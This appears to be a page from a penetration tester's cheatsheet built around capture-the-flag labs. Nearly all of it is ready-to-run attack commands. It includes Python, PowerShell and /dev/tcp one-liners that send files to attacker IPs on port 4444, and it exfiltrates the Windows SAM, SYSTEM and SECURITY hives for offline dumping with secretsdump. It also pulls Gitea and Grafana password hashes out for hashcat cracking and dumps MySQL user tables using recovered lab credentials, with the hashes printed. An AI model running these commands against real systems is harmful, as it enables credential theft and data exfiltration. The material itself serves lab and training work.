Etc

Download file via Python (oneliner)

python -c "import urllib.request; urllib.request.urlretrieve('http://example.com/file.txt', 'file.txt')"

Post file via Python (oneliner)

python -c "import urllib.request, urllib.parse; urllib.request.urlopen(urllib.request.Request('http://example.com/upload', data=urllib.parse.urlencode({'file': open('file.txt', 'rb').read()}).encode()))"

Send file via Python sockets (oneliner)

python -c "import socket; s = socket.socket(); s.connect(('localhost', 8080)); s.sendall(open('file.txt', 'rb').read()); s.close()"

Send file via Powershell sockets

$server = "127.0.0.1"
$port = 8080
$filePath = "file.txt"

$tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port)
$networkStream = $tcpClient.GetStream()
$fileBytes = [System.IO.File]::ReadAllBytes($filePath)
$networkStream.Write($fileBytes, 0, $fileBytes.Length)
$networkStream.Flush()
$networkStream.Close()
$tcpClient.Close()
function SendOverTcp {
    param ([string]$server, $port, $filePath)
    $tcpClient = New-Object Net.Sockets.TcpClient($server, $port)
    $stream = $tcpClient.GetStream()
    $bytes = [IO.File]::ReadAllBytes($filePath)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Close()
    $tcpClient.Close()
}

function SendOverTcp { param([string]$server, $port, $filePath); ($tcpClient = New-Object Net.Sockets.TcpClient($server, $port)).GetStream().Write(($bytes = [IO.File]::ReadAllBytes($filePath)), 0, $bytes.Length); $tcpClient.Close() }

SendOverTcp "localhost" 8080 "file.txt"
SendOverTcp "10.10.14.99" 4444 "C:\Program Files (x86)\hMailServer\Database\hMailServer.sdf"

Send file via Linux sockets

cat file.txt > /dev/tcp/IP/PORT
cat file.txt | base64 > /dev/tcp/IP/PORT
---
listen > file.txt
cat file.txt.base64 | base64 -d > file.txt

Hashdump locally with hives

Source: https://gist.github.com/sh1n0b1/8972807

nc -lvnp 4444 > sam.save &
nc -lvnp 4445 > system.save &
nc -lvnp 4446 > security.save &
---
# Save registry keys
reg save hklm\sam sam.save
reg save hklm\system system.save
reg save hklm\security security.save

# Exfiltrate registry
function SendOverTcp { param([string]$server, $port, $filePath); ($tcpClient = New-Object Net.Sockets.TcpClient($server, $port)).GetStream().Write(($bytes = [IO.File]::ReadAllBytes($filePath)), 0, $bytes.Length); $tcpClient.Close() }
$server = "10.10.14.123";
$port = 4444; $filePath = "C:\users\public\music\sam.save"; SendOverTcp "$server" "$port" "$filePath"
$port = 4445; $filePath = "C:\users\public\music\system.save"; SendOverTcp "$server" "$port" "$filePath"
$port = 4446; $filePath = "C:\users\public\music\security.save"; SendOverTcp "$server" "$port" "$filePath"
---
# Dump via impacket secretsdump
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

Note:Security may not be must?

Hashcat

Gitea to Hashcat

└─$ sqlite3 gitea.db "SELECT REPLACE(name || ':' || 'sha256:50000:' || BASE64(UNHEX(salt)) || ':' || BASE64(UNHEX(passwd)),CHAR(10),'') FROM user"
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

➜ .\hashcat.exe -a 0 -m 10900 .\hashes .\rockyou.txt

Grafana to Hashcat

└─$ sqlite3 grafana.db "SELECT REPLACE('sha256:10000:' || BASE64(CAST(salt AS BLOB)) || ':' || BASE64(UNHEX(password)),CHAR(10),'') FROM user"
sha256:10000:Q0ZuN3pNc1FwZg==:RBpxW9eI6SgXC+eVSxfLGd6DWi3t/ezoxlMnyx2bpr1H1w7bdCGwXZcGumFHy3GXOjQ=
sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb+j5ik+braJyDmUmVIYMWduTV3sSIBwBUSVjddb4g/G42WA=

➜ .\hashcat.exe -a 0 -m 10900 .\hashes .\rockyou.txt

MySQL Enumeration With Language

PHP

PDO

// Get databases
$p=new PDO("mysql:host=db","root","root");foreach($p->query("SHOW DATABASES")as$r)echo$r["Database"]."\n";

// Select database and get tables
$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SHOW TABLES")as$r)echo$r[0]."\n";

// Select database and dump table
$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SELECT * FROM users")as$r)print_r($r)."\n";
(remote) www-data@070370e2cdc4:/var/www/html$ php -r '$p=new PDO("mysql:host=db","root","root");foreach($p->query("SHOW DATABASES")as$r)echo$r["Database"]."\n";'
cybermonday
information_schema
mysql
performance_schema
sys
webhooks_api
(remote) www-data@070370e2cdc4:/var/www/html$ php -r '$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SHOW TABLES")as$r)echo$r[0]."\n";'
failed_jobs
migrations
password_resets
personal_access_tokens
products
users
(remote) www-data@070370e2cdc4:/var/www/html$ php -r '$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SELECT * FROM users")as$r)print_r($r)."\n";'
Array
(
    [id] => 1
    [0] => 1
    [username] => admin
    [1] => admin
    [email] => admin@cybermonday.htb
    [2] => admin@cybermonday.htb
    [password] => $2y$10$6kJuFazZjtlrAvBNvg4bpO2fQSunL56QFbodCKG6.Qjw87Z8.fYnG
    [3] => $2y$10$6kJuFazZjtlrAvBNvg4bpO2fQSunL56QFbodCKG6.Qjw87Z8.fYnG
    [isAdmin] => 1
    [4] => 1
    [remember_token] =>
    [5] =>
    [created_at] => 2023-05-29 04:10:36
    [6] => 2023-05-29 04:10:36
    [updated_at] => 2023-05-29 04:14:22
    [7] => 2023-05-29 04:14:22
)

MySQLi

$c=new mysqli("172.17.0.1","wp_user","wp_password");foreach($c->query("SHOW DATABASES")as$r){echo $r["Database"]."\n";};$c->close();
$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SHOW TABLES")->fetch_all()as$r)echo$r[0]."\n";
# Doesnt include headers
$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SELECT * FROM wp_users")->fetch_all()as$r)echo$r[0]."\n";
# Includes headers
$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");$q=$c->query("SELECT * FROM wp_users");while($r=$q->fetch_assoc())print_r($r)."\n";
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password");foreach($c->query("SHOW DATABASES")as$r){echo $r["Database"]."\n";};$c->close();'
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SHOW TABLES")->fetch_all()as$r)echo$r[0]."\n";'
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SELECT * FROM wp_users")->fetch_all()as$r)echo$r[0]."\n";'
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");$q=$c->query("SELECT * FROM wp_users");while($r=$q->fetch_assoc())print_r($r)."\n";'

Python

flask_sqlalchemy

# Get databases
from sqlalchemy import create_engine,text; print([db[0] for db in create_engine('mysql://username:password@host:port/').connect().execute(text('SHOW DATABASES')).fetchall()])

# Get tables
from sqlalchemy import create_engine, text; print([tb[0] for tb in create_engine('mysql://username:password@host:port/database').connect().execute(text('SHOW TABLES')).fetchall()])

# Get rows
from sqlalchemy import create_engine, text; [print(row) for row in create_engine('mysql://username:password@host:port/database').connect().execute(text('SELECT * FROM table')).fetchall()]
atlas@sandworm:/var/www/html/SSA/SSA/submissions$ python3 -c "from sqlalchemy import create_engine,text; print([db[0] for db in create_engine('mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA').connect().execute(text('SHOW DATABASES')).fetchall()])"
['SSA', 'information_schema', 'performance_schema']

atlas@sandworm:/var/www/html/SSA/SSA/submissions$ python3 -c "from sqlalchemy import create_engine, text; print([tb[0] for tb in create_engine('mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA').connect().execute(text('SHOW TABLES')).fetchall()])"
['users']

atlas@sandworm:/var/www/html/SSA/SSA/submissions$ python3 -c "from sqlalchemy import create_engine, text; [print(row) for row in create_engine('mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA').connect().execute(text('SELECT * FROM users')).fetchall()]"
(1, 'Odin', 'pbkdf2:sha256:260000$q0WZMG27Qb6XwVlZ$12154640f87817559bd450925ba3317f93914dc22e2204ac819b90d60018bc1f')
(2, 'silentobserver', 'pbkdf2:sha256:260000$kGd27QSYRsOtk7Zi$0f52e0aa1686387b54d9ea46b2ac97f9ed030c27aac4895bed89cb3a4e09482d')

DiryPipe

ncat -lvnkp PORT | tee FILENAME alternative, was meant to be single liner~: https://gist.github.com/xHacka/984d4c5cbe52e03205e5e5d2460b63ce

PreviousCheatsheetsNextLinux

Last updated